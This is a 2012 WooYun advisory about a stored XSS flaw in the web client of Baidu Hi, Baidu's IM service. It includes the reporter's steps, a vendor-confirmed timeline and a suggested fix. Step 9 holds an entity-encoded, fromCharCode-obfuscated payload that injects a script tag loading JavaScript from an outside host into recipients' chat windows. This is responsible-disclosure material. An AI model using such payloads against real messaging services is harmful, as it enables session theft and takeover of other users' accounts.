当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-07968

漏洞标题:百度某IM通讯产品存储型XSS

相关厂商:百度

漏洞作者: gainover

提交时间:2012-06-06 23:02

修复时间:2012-07-21 23:02

公开时间:2012-07-21 23:02

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-06-06: 细节已通知厂商并且等待厂商处理中
2012-06-07: 厂商已经确认,细节仅向厂商公开
2012-06-17: 细节向核心白帽子及相关领域专家公开
2012-06-27: 细节向普通白帽子公开
2012-07-07: 细节向实习白帽子公开
2012-07-21: 细节向公众公开

简要描述:

不知道这个产品现在还有多少人在用呢? 反正应该还是有用户群的,有用户群就有危害~~,如果

详细说明:

1. 收到百度HI的消息,就进去看消息,突然想了想,这里会不会有漏洞呢?
2. 进入百度HI网页版,开了个百度的小号,进行测试。
3. 首先,还是老办法,给小号发送一张图片,并打开调试工具,查看发送的那个图片。


4. 同时,我们还对发送数据进行抓包。


5. 可以看到上面2个图中的相同之处。
6. 由于是聊天窗口,消息肯定是采用innerHTML之类的输出,如果没过滤 " > 之类的,则可以对输出内容进行闭合并构造。
7. 首先做一个简单的测试。 我们将POST的数据中 body参数修改如下:
POST URL:http://web.im.baidu.com/message (仅列出被修改的参数)

body = <msg><font n="宋体" s="10" b="0" i="0" ul="0" c="0"/><img n="9BA5EC29F8" md5="417a8481ac7956d21cab61af19b89a93&quot;&gt;" t="png"/></msg>
(encodeURIComponent编码一下)


说明:将md5的值末尾加了&quot;&gt;
8. 可以看到我的号收到了消息,并且侧漏了!!


9. 这说明,百度这里确实没有过滤,进而构造利用代码,将body参数改为以下内容。 

<msg><font n="宋体" s="10" b="0" i="0" ul="0" c="0"/><img n="9BA5EC29F8" md5="d1057ebb757b5229c4e8a2c556924b9d&#34;&#62;&#60;&#105;&#109;&#103;&#47;&#115;&#114;&#99;&#61;&#49;&#32;&#111;&#110;&#101;&#114;&#114;&#111;&#114;&#61;&#40;&#102;&#117;&#110;&#99;&#116;&#105;&#111;&#110;&#40;&#41;&#123;&#119;&#105;&#110;&#100;&#111;&#119;&#46;&#115;&#61;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#83;&#116;&#114;&#105;&#110;&#103;&#46;&#102;&#114;&#111;&#109;&#67;&#104;&#97;&#114;&#67;&#111;&#100;&#101;&#40;&#49;&#49;&#53;&#44;&#57;&#57;&#44;&#49;&#49;&#52;&#44;&#49;&#48;&#53;&#44;&#49;&#49;&#50;&#44;&#49;&#49;&#54;&#41;&#41;&#59;&#119;&#105;&#110;&#100;&#111;&#119;&#46;&#115;&#46;&#115;&#114;&#99;&#61;&#83;&#116;&#114;&#105;&#110;&#103;&#46;&#102;&#114;&#111;&#109;&#67;&#104;&#97;&#114;&#67;&#111;&#100;&#101;&#40;&#49;&#48;&#52;&#44;&#49;&#49;&#54;&#44;&#49;&#49;&#54;&#44;&#49;&#49;&#50;&#44;&#53;&#56;&#44;&#52;&#55;&#44;&#52;&#55;&#44;&#49;&#50;&#48;&#44;&#49;&#49;&#53;&#44;&#49;&#49;&#53;&#44;&#49;&#49;&#54;&#44;&#52;&#54;&#44;&#49;&#49;&#53;&#44;&#49;&#48;&#53;&#44;&#49;&#49;&#48;&#44;&#57;&#55;&#44;&#57;&#55;&#44;&#49;&#49;&#50;&#44;&#49;&#49;&#50;&#44;&#52;&#54;&#44;&#57;&#57;&#44;&#49;&#49;&#49;&#44;&#49;&#48;&#57;&#44;&#52;&#55;&#44;&#49;&#48;&#57;&#44;&#52;&#54;&#44;&#49;&#48;&#54;&#44;&#49;&#49;&#53;&#41;&#59;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#119;&#105;&#110;&#100;&#111;&#119;&#46;&#115;&#41;&#125;&#41;&#40;&#41;&#62;&#60;&#98;&#32;&#97;&#61;&#34;" t="png"/></msg>


10. 以上测试代码,调用外部JS, 效果见漏洞证明

漏洞证明:

大号发小号: IE


小号发大号:Chrome

修复方案:

输出时,将&转换为 &amp; ,同时既然是md5,字段完全可以正则进行严格控制。

版权声明:转载请注明来源 gainover@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2012-06-07 11:48

厂商回复:

感谢提交,修复中。。

最新状态:

暂无